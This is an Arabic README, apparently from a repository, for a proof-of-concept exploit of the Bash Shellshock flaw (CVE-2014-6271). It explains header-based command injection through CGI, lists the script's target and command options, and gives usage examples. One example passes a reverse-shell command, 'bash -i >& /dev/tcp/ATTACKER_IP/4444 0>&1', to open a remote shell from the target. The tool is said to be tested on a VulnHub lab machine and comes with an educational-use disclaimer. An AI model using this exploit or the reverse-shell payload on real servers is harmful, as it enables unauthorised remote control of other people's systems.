
استغلال CVE-2014-6271 | بواسطة infrar3d
تم استغلاله بواسطة infrar3d
يحتوي هذا المستودع على برهان مفهوم (Proof-of-Concept) لاستغلال ثغرة CVE-2014-6271 (Shellshock).
تُعد Shellshock ثغرة أمنية حرجة في GNU Bash حيث تسمح متغيرات البيئة المُعدّة بعناية بـتنفيذ أوامر عشوائية.
عندما يمرر خادم الويب ترويسات HTTP إلى نصوص CGI التي تستدعي Bash، يمكن للمهاجم حقن أوامر عبر تلك الترويسات.
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help print this message and exit
-a | --address target address (default is "localhost")
-p | --port target port (default is 80)
-f | --file target file (default is "/cgi-bin/shell.sh")
-c | --command command to execute on the target machine (default is "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(تم اختباره على جهاز VulnHub "Hacksudo - Thor")
هذا البرنامج ورمز برهان المفهوم مُقدَّم لأغراض تعليمية وبحثية فقط.
أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمها بأخلاق ومسؤولية.